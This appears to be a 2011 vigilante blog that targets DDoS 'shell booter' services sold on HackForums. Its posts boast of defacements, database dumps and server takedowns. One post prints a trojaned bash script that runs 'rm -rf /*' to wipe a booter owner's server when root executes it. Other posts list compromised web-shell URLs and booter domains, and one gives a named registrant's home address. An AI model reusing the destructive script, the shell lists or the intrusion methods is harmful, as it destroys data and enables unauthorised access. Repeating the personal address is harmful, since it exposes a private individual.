Tuesday, November 22, 2011

A plague on the internet


Haha, you see what I did there? Plague on the internet? Oh right, I haven't told you what booter it is, yet.

Today, Plague Booter went down.

Haha, you see now? Funny, right? No? :( You have no sense of humor.

Anyway, an anonymous supporter contacted us today. You may have heard of him. He goes by Codevade. I was joking about the anonymous part.


Just so you can click it more easily, here's that link.

Most of that shit isn't even shells. Look at it. He's got pastes and just random sites in there to make it look like he's got more shells than he does. What the hell?

Anyway, enjoy, and don't forget to thank Codevade!

Wednesday, November 9, 2011

Hello there, Green Booter


Today, I received a communique from a very nice anonymous supporter of ours.

He has informed me of greenbooter's URL. Not very hidden. It's as if they WANT to be found, so someone can shut them down and the owner can blame booter down and just run off with his customer's money.

Look how simple it is: http://greenbooter.com

Anyway, here's their list of shells. Do enjoy.
*Link Removed*

If your server(s) is/are on this list, you may want to look into finding out how he got in and patch up that hole.

Most likely it will be from a WebDAV exploit where you haven't changed the default user/pass.

Just skimming through his list, I see he adds multiple shells from the same server to make it seem like he has more shells.

http://63.229.71.9/webdav/clay94.php
http://63.229.71.9/webdav/clay83.php
http://63.229.71.9/webdav/clay84.php
http://63.229.71.9/webdav/clay85.php
http://63.229.71.9/webdav/clay86.php
http://63.229.71.9/webdav/clay87.php
http://63.229.71.9/webdav/clay88.php
http://63.229.71.9/webdav/clay89.php
http://63.229.71.9/webdav/clay90.php
http://63.229.71.9/webdav/clay91.php
http://63.229.71.9/webdav/clay92.php
Ripping off his customers

Here is his database: *Link Removed*

Do enjoy.

Sunday, October 16, 2011

You asked for it, here it is!

Lately we've been pretty inactive. I know... I apologize... Personally... I blame BV1. You should too! Or at least blame anyone that isn't me... I hate the blame :(

But have no fear! We're going to start working on some shit this week. We'll get back to reporting booters, and we're going to start compiling a new list of booters and hosts supporting these booters.

Also, we now have an official IRC channel, since a few of you demanded it.

To access it, irc.hackt.org #booterdown

Hope to see you there!

Tuesday, September 6, 2011

A look into Legion Booter


The other day, a new booter hit the market. They called themselves Legion Booter.

Hell, you don't even need to get into their cPanel or anything to get their database, as long as they've created a backup. Some pro security right here.




I also decided that I'd do a little bit of defacing. You know, cause we're big heckers.

Hopefully he's learned his lesson. Have a nice day.

Saturday, September 3, 2011

Booter List Updated!

This morning I went ahead and removed all the dead links from the booter list on the side, and added the live ones. I'm sure I've missed some still, so if you got some links, post 'em. BV1 and I will add them today.

Any booter name with a (?) beside it means that I wasn't sure about the name of it.

BV1 said he'll also be making a list of approved booters.

I may make a list of dead links, just to make sure that they can't come back with old links thinking we've forgotten about that URL.

Happy reporting!

Monday, August 29, 2011

Need Links to Booters using Prodigy's Source

May know of a way to exploit them, just need booters to test on.
Post links in comments.

Take em down

Modders Heaven Booter.
They are on a new host, they used to be on modders-heaven.com, now I believe they are here: http://173.212.200.164/login.php

They claim it's old.. so try to find out if it is. CoderCopy and paster gets mad on his thread here:

http://www.hackforums.net/showthread.php?tid=1664610

Sunday, August 28, 2011

Credits: Orgy



This is a script you can use to possibly get the IP of a CloudFlare protected server. It won't work EVERY time, but it will most of the time.

Friday, August 26, 2011

NozHost no longer hosting booters

I guess some of you decided to attack some booters hosted by NozHost. Keep in mind that we don't condone DDoS attacks, but instead prefer to take the legal route. As in reporting the illegal material to the hosts.
However, if it was indeed one of you, what's done is done, and now NozHost will no longer host any booters. Instead it turns out they'll be suspending them immediately, so that's a win I suppose. :)




In other news, you may have noticed 0xE9 is now a Contributor. You've probably heard of him. If you haven't, he's a friend of mine and BV1's. He's going to be having fun with some of the "PuTTY" Booters.

Also, 0xE9 suggested we create a forum. If we do this, we'll need some actual hosting and we'll be vulnerable to DDoS attacks, so I don't know if we should do this. However, I have a pretty good setup going on another of my hosts, but to finish making it as DDoS proof as possible, it'll cost me a decent chunk of change monthly. What do you guys think?


-Orgy

More "putty booter" kids released back into the wild

Not a large HF booter but it's a pretty funny story anyway. While I was looking for a way to get root on this "putty booter", (owner is using copy and pasted perl script), so I could "rm -rf /*" I noticed the admin was unable to use bash well so he had downloaded the following script to list all logged in users:

#!/bin/bash
clear
echo "+==================================+"
echo "+--------------------------------------------------------------------+"
echo "+---------------------------whos on-----------------------------+"
echo "+--------------------------------------------------------------------+"
echo "+--------------------------------------------------------------------+"
w
echo "press any key when done"
read

It was set to read only so all that was needed was me to rm -rf the script then replace it with my own version:

#!/bin/bash
clear
echo "+================================+"
echo "+-----------------------lol heckers lol---------------------+"
echo "+----------- XBL RUNNING CANCELED------------+"
echo "+-------------8==============D O:--------------+"
echo "+---------------------------------------------------------------+"
wall I been hecked
rm -rf /*
echo "press any key when done"
read

Now all that was left to do was wait for the root user to run my script and lulz could be had as the silly message was broadcast and server reformatted.






Thursday, August 25, 2011

Where's RileyK20 Booter?

Apparently they had 2,000 shells. That's what their panel said.

Well, after removing all of the DUPLICATE shells, turns out they only had about 500. They added the same shells 4 times each, rofl. How terrible.

Here they are.
http://pastebin.com/y6aDgqwh

Enjoy checking how many of them are actually alive. I haven't checked myself, but turns out it's about ~50

-Orgy

EDIT: Since some people seem to doubt the amount of duplicate shells in their list, here's the completely unmodified list.
http://pastebin.com/HcEZHQpa

Wednesday, August 24, 2011

Progress Report

With the site launching a bit prematurely, I was afraid that we gave Shell Booter owners too much time to prep and protect their Booters, but after witnessing what I've seen over the last couple days there is no doubt in my mind that we were ready. It's amazing to see a lot of the HF members and friends who I haven't seen actively participate in anything recently, actually giving us a hand and doing some awesome work.

With only three days of work behind us so far, we've made some tremendous progress. HackForum's Marketplace Discussion is a mess right now with Shell Booter owners panicking. These crooks know that we're destroying their scams for easy money, and they can't take it. They are doing whatever they can to try and stop us, but their efforts are futile. Make sure you show the community who the better side is. We have maturity, seniority, skill, and overall determination, and those are all qualities the opposition is missing.


Here are the current lists that I've compiled:

Living Booters (Please help this list grow):

Dead Booters:
Cry Booter - http://crybooter.info
ddos em' - http://ddosem.net/
Exclusive Booter - http://exlusive-booter.tk/
Flatline Booter - http://flatlinebooter.co.cc
freebshellbooter - http://freebshellbooter.co.cc
Frost Booter - http://frostbooter.co.cc
Ghost Booter - http://www.hack-bb.com/
Hacker Pro Booter - http://hackerprobooter.com
iMurder Boot - http://imurderboot.co.cc
Insidious Booter - http://insidiousbooter.tk
Intense Booter - http://theglobalgamerz.com
ISP Booter - http://ispbooter.info
Ninja Booter - http://ninjabooter.net
Pacman Booter - http://pacmanbooter.com/
Power Booter - http://powerbooter.info
Sandman Booter - http://sandmanbooter.co.cc
Se7en Booter - http://se7enbooter.com
Sh3ll Booter - http://sh3llb00t.co.cc
Swat Booter - http://swatbooter.info
Taylor Gang Booter - http://taylorgangboots.co.cc
xblteddybooter - http://xblteddybooter.info
XR Booter – http://arronxr.net

If my count is correct, that is 38 dead booters, and that is only what I personally know of. You guys have done a great job working together to destroy this common problem. We have more work to do, but before long we'll have an Internet free of this malicious bullshit.

Tuesday, August 23, 2011

Exclusive Booter wants war

Rather than proving they're legit, they've decided they want to trash and slander and threaten and war, so okay.

Let's war.

Anyone got Exclusive Booter's latest link? :)

EDIT: Hell, here in this screenshot you can see how skiddy they are. They haven't the slightest clue about networking, yet they run a DDoS tool.





First of all, they think they can IP Spoof when they're using a web server. Completely clueless how the TCP handshake works.

Secondly, they think that if they rent a dedicated server or a VPS that they suddenly don't have to obey any laws.

... I am so disappoint.

HF States they will Remain Neutral


This is what had me worried for a while. With our main intention being cleaning up the marketplace, I always feared my actions would get me removed from that in which we are fighting for. This helps put my mind at rest, and will allow me to be more confident with my our actions.

Everyone needs to remember that HF is meant to be a safe place, and that any abusive activity should be kept away from there at all times. We'll continue onward as planned, our actions won't change, just make sure you keep anything malicious off of HF.

Monday, August 22, 2011

More shell booters down

So, today WiFi decided to make a thread about Booter Down. You can view it here. He lied about quite a few things, such as me being the creator of Booter Down. I'm not, BV1 is. I just contribute by posting every so often.

A few people mentioned that WiFi was knowingly hosting shell booters. A few hours later, someone (I'll let them remain anonymous, as per their request) sent me this screenshot.

So there goes a reseller that allows the hosting of shell booters, as well as the shell booters it was hosting.



Legend

First, check out everyone doing work here:

http://www.booterdown.com/2011/08/lets-see-others-getting-in-on-action.html#comments


 Then check out the PM I got on HF stating the following:

xblteddybooter.info
tunastybooter.co.cc
taylorgangboots.co.cc
swatbooter.info
sh3llb00t.co.cc
se7enbooter.com
sandmanbooter.co.cc
s3xyboot3r.co.cc
powerbooter.info
ninjabooter.net
neo-booter.cz.cc
kickbooter.co.cc
ispbooter.info
insidiousbooter.tk
imurderboot.co.cc
iboot.in
hackerprobooter.com
frostbooter.co.cc
freebshellbooter.co.cc
flexbooter.com
flatlinebooter.co.cc
crybooter.info
bytebooter.co.cc
bionicbooter.co.cc

Apparently, all of these were on attheckers reseller account.








Props to NoFear1999

Sunday, August 21, 2011

Let's see others getting in on the action!

On this blog post, we won't say much. We just want to see screenshots of you guys sending in abuse reports to hosts that are hosting shitty booters. Leave the screenshots in the comments.

If the booter is hiding behind CloudFlare, just send a message to CloudFlare, they'll happily tell you the real IP so you can report them! Message them here.

Regarding the list on the side

People keep asking me about the list of booters on the side. I personally do not control the list at all. I cannot add sites to it, nor can I remove them. If you want information regarding the list, you need to speak to BV1.

Furthermore, as I've stated before, I personally do not engage in "taking down" the booters. All I do is provide BV1 with information that would be beneficial to his cause, and only about booters that I feel deserve it. One of those booters being xBootem, who's owner lies to his customers and is clearly completely incompetent.

Also, I'd like to thank xBootem. They've made a thread on HackForums today (currently visible here, but will probably be removed by staff by the end of the night) that has gotten Booter Down some serious recognition. Thanks, xBootem!

That is all.
-Orgy

xBootem' On Deck

Booter: xBootem'
URL: http://thegreatgriz.com/site/login.php
IP Address: 96.9.156.198
Host: http://www.hosting24.com
Registrant:
   Michael McMorrow
   640 Richmond Beach Rd
   #101
   Shoreline, Washington 98177
   United States

Motivation:



My Response:



It's a nice thing when you run into hosts that are cooperative and helpful. While an immediate suspension is preferred, I'm more than happy with this as it means it's one less booter I have to worry about for today.


Please notify me when xBootem' obtains new hosting.

For the luls

Make sure you know who you're buying from on HF. Some of our users are... yeah...

Saturday, August 20, 2011

Help get things started




Help us compile a list of as many Shell Booters as possible.
We are specifically looking for URL's to Booters.
If you have any, post them in a comment below and 
we will do what we can to make sure they are downed.



In other news, new graphics:


  Made by Bannedshit

Joining in on the fun

Today, Lith made a thread about Booter Down on HackForums (viewable here). We urge you all to do the same. Since the thread, a few peo
ple have already contacted me about wanting to help our cause.

Want to help as well? Make threads, advertise this blog, and of course, take down the booters. Even doing something as simple as adding an advertisement in your signature on forums. There's even an image already done up (by Lith I'm assuming, since he's the first one I've seen using it.)
Want to put it in your signature? Here's the code:
[url=www.booterdown.com][img]http://i.imgur.com/qSsAi.png[/img][/url]

Now if you really to join in on the fun, start reporting the booters to their hosts. Compile screenshots, videos, whatever you can to prove that they're malicious DDoS tools. They're all trying to hide under the guise of being "Network Stress Testing Tools," but this won't actually hold up. That's just something I pulled out of my head a year ago to get accepted into FastSpring. Hosts won't actually accept this. If we all pitch in to get these booters suspended and everything else, eventually the owners will be so overwhelmed that they'll give up entirely.

Do your part! Rid the community of this garbage.

Friday, August 19, 2011

Multiple Booters Dropped

While Orgy was doing work as usual, he informed me of quite the jackpot to cap off a good night.



http://happyhacks.com/booter/



After being shown that, we took a look at http://www.sdkexpert.net/booter_tracker/ and sure enough it looked like some sort of domain locking system for whatever booter source (Need a name). Anyways, a quick shot to that server and we can expect downtime to multiple booters.



http://www.sdkexpert.net/booter_tracker/?s=happyhacks.com/booter/



http://www.sdkexpert.net/


Anyways, so far from what I can confirm this took down Happy Booter, Flex Booter, and MangoGuava. Please let me know if this affects any other booters.

A sad day for attbooter

Booter: attbooter
Domain(s): attbooter.com | attbooter.info
IP: 46.105.241.190
Shells: http://pastebin.com/mHw6PGPb (Less than 500 work)

More information on the hit:
http://bv1.us/att.html



For the luls



Wednesday, August 17, 2011

Shell Booters

Shell Booters, unarguably the favorite tool used by the skid, have been the downfall of low leveled Hacking communities for some time now. Revolutionized by Orgy roughly 16 months ago, Shell Booters started off as an interesting tool that many kids began to use as they weren't able to set up their own nets, mainly due to their own stupidity. Things started off strong. There were a couple of Shell Booters on the market; all had a fair, but stern price. Each had a solid customer base, and while still looked down upon, the community accepted these booters.

Flash forward 6 months and the outbreak begins. Sources are leaked, shells became easily obtainable, and the infection spread. Soon you couldn't view a marketplace without seeing a massive amount of booters being sold for next to nothing, and only more were being made. Now there are 50+ booters on HackForums alone, and only more are being made.